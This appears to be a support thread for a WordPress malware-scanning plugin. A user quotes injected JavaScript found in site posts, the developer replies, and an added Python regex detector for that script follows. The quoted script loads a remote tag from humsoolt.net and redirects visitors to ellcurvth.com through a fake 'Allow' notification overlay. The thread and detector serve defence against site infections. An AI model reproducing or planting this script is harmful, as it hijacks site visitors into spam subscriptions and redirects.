Hiya, great tool as always!!! Many many thanks Eli.
Found that a new variation of this injected code is not being picked up.
tried a mysql query and it’s not picking up a char immediately after ““Allow—. char looks like a sq with 009D
When pasted into a SQL query however it renders as a red bullet.
Database charset is utf8mb4_unicode_ci.
Have wrapped the char in a code tag; see HTML view of this msg.
;
const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow†to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement(‘script’);
s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
Did you find this code in your DB?
I checked it against my current definition and it should be found by my DB Scan.
If this code is found in a file then please send me this file so that I can recheck it.
It’s in posts files (not necessarily pages but other posts) /wp-admin/post.php?post=1615&action=edit
Happy to give access to phpMyAdmin and wp-admin.
Just a quick thank you… the latest version deletes the variation of malware… can’t recommend your plugin enough! Many many thanks.
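A check for the script pattern posted above that does not depend on the quote characters or on the overlay text, so the stray character after "Allow" cannot hide it (an added example, not code from the plugin or from any poster in this thread). The sample posts, the example.invalid host names and the two-marker threshold are assumptions made for the example.

```python
import re

# Any quote-like character: straight, typographic (as WordPress stores them), primes.
Q = "['\"\u2018\u2019\u201c\u201d\u2032\u2033]"

# Structural markers of the injected loader. None depends on the overlay text,
# so a mis-encoded character after "Allow" cannot hide the script.
MARKERS = {
    "script_element": re.compile(r"createElement\(\s*" + Q + "script" + Q),
    "remote_tag": re.compile(
        r"\.src\s*=\s*" + Q + r"(?:https?:)?//[^\s'\"]+?/tag\.min\.js\?z=\d+"),
    "permission_redirect": re.compile(
        r"\.on(?:Permission(?:Default|Allowed|Denied)|AlreadySubscribed)"
        r"\(\s*\(\)\s*=>\s*\{\s*window\.location\.replace\("),
}

def c1_controls(text):
    """List C1 control characters (U+0080..U+009F), a sign of mis-decoded text."""
    return sorted({f"U+{ord(ch):04X}" for ch in text if 0x80 <= ord(ch) <= 0x9F})

def scan_post(content):
    """Report loader markers and C1 controls found in one post_content value."""
    hits = [name for name, rx in MARKERS.items() if rx.search(content)]
    # Assumption: two or more markers together are treated as an infection.
    return {"markers": hits, "c1": c1_controls(content), "infected": len(hits) >= 2}

# Constructed sample rows (post ID -> post_content); host names are placeholders.
SAMPLE_POSTS = {
    101: ("<p>Intro</p><script>const overlay = {\u201cdescription\u201d:\u201dClick "
          "\u201cAllow\u00e2\u20ac\u009d to subscribe\u201d};"
          "const s = document.createElement(\u2018script\u2019);"
          "s.src=\u2019//cdn.example.invalid/pfe/current/tag.min.js?z=1234567\u2032;"
          "s.onload = (sdk) => {sdk.onPermissionDenied(() => "
          "{window.location.replace(\u201c//go.example.invalid/afu.php?zoneid=7654321\u2033)});}"
          "document.head.appendChild(s);</script>"),
    102: "<script>const s = document.createElement('script'); s.src='/js/app.js';</script>",
    103: "<p>Click Allow to subscribe to our newsletter.</p>",
}

if __name__ == "__main__":
    for post_id, body in SAMPLE_POSTS.items():
        print(post_id, scan_post(body))
```

Post 102 shows why a single marker is not treated as an infection: creating a script element is ordinary in legitimate post content.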